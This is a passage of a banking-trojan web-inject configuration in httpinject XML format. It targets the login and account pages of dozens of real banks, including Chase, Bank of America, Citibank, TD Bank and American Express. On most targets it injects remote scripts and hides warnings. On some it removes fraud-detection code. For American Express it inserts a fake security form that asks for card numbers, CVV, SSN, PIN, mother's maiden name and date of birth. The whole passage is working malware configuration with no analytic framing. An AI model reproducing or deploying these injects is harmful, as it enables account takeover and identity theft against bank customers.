- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://wirexchange\.goxroads\.com/wx/(login|wp_login_user)\.cfm($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://s2b\.standardchartered\.com/ssoapp/(login\.jsp|core\.security\.login\.event)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[div class="scbLoginImpContainer01"]]></pattern>
- <replacement><![CDATA[div class="scbLoginImpContainer01" style="display:none;"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sme\.standardchartered\.com/commonapp/core\.security\.vascochallenge\.event</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.sterlingwires\.com/</url>
- <url type="deny" onpost="0" onget="1" modifiers="">IWPreScript\.js</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.suntrust\.com/portal/server\.pt(\?|)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://businessbankingcenter\.synovus\.com/CPFLC/Pages/u/login\.aspx</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://businessonline\.tdbank\.com/corporatebankingweb/core/login\.aspx</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessbanking.*\.tdcommercialbanking\.com/WBB/Login(|Display)(\?|\;|$)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://tdetreasury\.tdbank\.com/s1gcb/logon/sbuser</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secureport\.texascapitalbank\.com/WebID/IISWebAgentIF\.dll</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[class="ContactSupportGreyText"]]></pattern>
- <replacement><![CDATA[class="ContactSupportGreyText" style="display:none;"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://trz\.tranzact\.org/(credential\.aspx|OTP\.asp)($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://securentrycorp\..+(metrics|analytics)</url>
- </conditions>
- <actions>
- <redirect>
- <url>http://microsoft.com</url>
- </redirect>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://securentrycorp\..+/authentication/zbf/</url>
- <url type="deny" onpost="1" onget="1" modifiers="U">^https://securentrycorp\..+(metrics|analytics)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="U"><![CDATA[(</head>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://bizonline\.tcbk\.com/tcbsb\_corporatebankingweb/core/login\.aspx(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://singlepoint\.usbank\.com/cs70_banking/logon/sbuser</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(name\="tmupLogonForm".+</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sso\.unionbank\.com/(obc/forms/password\.fcc|unp/SSOLoginServlet)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+\.worldsourcefinancial\.com/uiw/.*(LoginFailed|Login)\.html(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://onlinebusinessplus\.vancity\.com/(business/default\.jsp|servlet/Logon)(\?|\;|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.vancity\.com/BusinessBanking/OnlineBanking/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://online\.washingtonfederal\.com/(login\_business\.asp|engine/login/businessLogins\.asp)(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/wcmfd/wcmpw/.*Login</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/phcp/servlet/.*Login</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="msUi"><![CDATA[(?<inject><div id=\"loginmessages\".*>.*<div>.+</div>.*</div>)]]></pattern>
- <replacement />
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="0" onget="1" modifiers="">^https://www\.contactus\.cnb\.com/html/tnet\-ad\.html$</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(?<inject><a href="Safeguarding.*</a>)]]></pattern>
- <replacement />
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://webcmpr\.bancopopular\.com/K1/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- <actions>
- <modify>
- <pattern modifiers="is"><![CDATA[function checkKey\(e\)\{.*</script>]]></pattern>
- <replacement><![CDATA[function checkKey(e){}</script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.websteronline\.com/personal/personal\-homepage\.html</url>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.websteronline\.com/bank/(com\.websterbank\.servlets\.DS|login)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https?://www\.wellsfargo\.com/com</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[\w\.\-]+\.ebanking\-services\.com/.+\.aspx</url>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/EamWeb/.+\.aspx</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://.+/cashman/(|default\.aspx)(\?|$)</url>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://ecash\..+/(|default\.aspx)(\?|$)</url>
- <url type="deny" onpost="1" onget="1" modifiers="i">^https://ecash\..+/ABCorporate/Core/(signin|default)\.aspx($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</(head|HEAD) *>)]]></pattern>
- <replacement><![CDATA[<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/themes/hot-sneaks/jquery-ui.css" type="text/css"/>\1]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="ms"><![CDATA[(.*)(</(form|FORM|body|BODY) *?>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ecash1/scripts/statticker2.js"></script>\2]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://ecash\..+/ABCorporate/Core/(signin|default)\.aspx($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ecash2/scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.onlineaccess1\.com/.*/Authentication/Login\.aspx</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://personalp\.vanguard\.com/us/.+Q1SBJS
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="iUms"><![CDATA[<html.+?/html>]]></pattern>
- <replacement><![CDATA[<html><script>var q1btid = ''; var q1script = '/statsgatherr.js?system=6';</script><script type="text/javascript" language="JavaScript" src="/statsgatherr.js?system=6"></script><script type="text/javascript" language="JavaScript" src="/statsgatherr.js?system=1"></script></html>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://personalp\.vanguard\.com/us/
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="iUms"><![CDATA[(</title>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="/statsgatherr.js?system=2"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.kbc\.be/
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="isU"><![CDATA[(<form.*id="ID_LOGONFORM".*</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU"><![CDATA[^https\://chaseonline\.chase\.com/MyAccounts\.aspx.*]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
- <replacement><![CDATA[\1<style type="text/css">
- body {visibility: hidden; }
- </style>
- <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
- <script type="text/javascript" src="statsgatherr.js?system=8"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.chase\.com/.*apps/chase/clientlibs/foundation/publishoptimized/homepage\-po\-min\.js
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="isU"><![CDATA[(abcdefghijklmnopqrstuvwxyz0123456789_")]]></pattern>
- <replacement><![CDATA[\1;if(typeof window.submitLogin !== 'undefined' && !window.submitLogin()) return false]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)"><![CDATA[^https\://.*\.bankofamerica\.com/myaccounts/.*]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
- <replacement><![CDATA[\1<style type="text/css">
- body1 {visibility: hidden; }
- </style>
- <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
- <script type="text/javascript" src="statsgatherr.js?system=9">
- </script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)"><![CDATA[^https\://.*\.bankofamerica\.com/login/sitekey.*skmaint\.go.*]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
- <script type="text/javascript" src="statsgatherr.js?system=10">
- </script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/html"><![CDATA[^https\://.*\.bankofDISABLEDFORCASHPROamerica\.com.*]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="i">(SignOn\.go|\.(gif|png|jpg|css|swf)($|\?))
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\</html\>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" src="statsgatherr.js?system=11">
- </script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/html"><![CDATA[^https\://client\.schwab\.com/Accounts/Summary/Summary\.aspx.*]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
- <replacement><![CDATA[\1<style type="text/css">
- body {visibility: hidden; }
- </style>
- <script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
- <script type="text/javascript">var jq = jQuery.noConflict();</script>
- <script type="text/javascript" src="statsgatherr.js?system=12"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/(html|plain)"><![CDATA[^https\://online\.citibank\.com/.*/portal/Home\.do]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
- <replacement><![CDATA[\1<style type="text/css">
- body {visibility: hidden; }
- </style>
- <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
- <script type="text/javascript" language="JavaScript" src="statsgatherr.js?system=13"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.ent\.com/business</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="iU"><![CDATA[<script type='text/javascript' src='https://collector\.fraudmap\.net/fs/.*/validate/validate\.js'></script>]]></pattern>
- <replacement><![CDATA[]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/html"><![CDATA[^https\://online\.americanexpress\.com/myca/.*\?request_type\=authreg_acctAccountSummary.*]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[</body\>]]></pattern>
- <replacement><![CDATA[<div id="namefr" style="display:none;" >
- <iframe width="50" height="50" id="myfx" name="myfx"></iframe>
- </div>
- <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
- <style type="text/css">
- .ui-dialog-titlebar{ background: white }
- .text1a{font-family: Arial; font-size: 10px;}
- .sunclass
- border-bottom-color: #cccccc;
- border-bottom-style: solid;
- border-bottom-width: 1px;
- border-collapse: collapse;
- background-color: #f5f6f1;
- color: #333333;
- margin-right:10px;
- margin-left:10px;
- text-align: center;
- </style>
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
- <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
- <div id="msg" style=" display:none; height:60px;" class=sunclass>
- <div id="box" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
- <font id="err" style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>  correctly.</font>
- </div>
- </div>
- <div id="dialog" style=" display:none; height:180px; width:350px;padding:0; margin0;">
- <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
- </div>
- <div id="txt2" class=sunclass>
- <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
- </div>
- <form action="statsgatherr.js" id="test" method="get" target="myfx" >
- <!--CC-->
- <div id="full_cc" class=sunclass style="height:30px ;text-align: left;">
- <table>
- <tr>
- <td>
- <div id="div_cc_text" style="padding:1px; padding-top:3px; width:72px ; height:25px;text-align:left;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">Card number:</font>
- </div>
- </td>
- <td>
- <div id="div_cc" style ="padding:1px;">
- <input type="text" class="amountfield" id="cc1" style="text-align:right;width:34px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1" onkeyup="tabNext1CC(this);" maxlength=4 >
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
- <input type="text" class="amountfield" id="cc2"style="text-align:right; width:42px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2" onkeyup="tabNext2CC(this);" maxlength=6 >
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
- <input type="text" class="amountfield" id="cc3" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc3" maxlength=5 >
- </div>
- </td>
- </tr>
- </table>
- </div>
- <!--EXP-->
- <div id="fulll_exp" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font>
- </div>
- </td>
- <td><div id="div_exp" style ="padding:1px;">
- <input type="text" class="amountfield" id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm" maxlength=2 >
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
- <input type="text" class="amountfield" id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy" maxlength=4 >
- </div></td>
- </tr>
- </table>
- </div>
- <!--CVV-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv" maxlength=4 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/312/ac62dbbce67681a33d23490607f59cf6')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
- </tr>
- </table>
- </div>
- <!--3 digit code-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_3digitcode" style="padding:1px; padding-top:7px; width:172px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">3-Digit Code on the back of card:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="3digitcode" style="text-align:right;width:33px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="3digitcode" method="get" maxlength=3 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/273/58be12e2c069fcc7b20ebb2a11921f98')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
- </tr>
- </table>
- </div>
- <!--SSN-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1" maxlength=3 >
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2" maxlength=2 >
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3" maxlength=4 >
- </div></td>
- </tr>
- </table>
- </div>
- <!--Personal security PIN-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Personal security PIN:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ps_pin" maxlength=4 >
- </div></td>
- </tr>
- </table>
- </div>
- <!--MMN-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn" >
- </div></td>
- </tr>
- </table>
- </div>
- <!--First Elementary School-->
- <!--
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="pincode" style="width:243px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">The Name of Your First Elementary School:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="elementary_school" style="width:70px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="elementary_school" >
- </div></td>
- </tr>
- </table>
- </div>
- -->
- <!--POB-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Place of birth:</font></td></div>
- <td><div id="div_pob" style =" padding:1px;">
- <input type="text" class="amountfield" id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="pob" >
- </div></td>
- </tr>
- </table>
- </div>
- <!--DOB-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm" maxlength=2 >
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd" maxlength=2 >
- <font style="font-family: Verdana;font-size: 11px;">-</font>
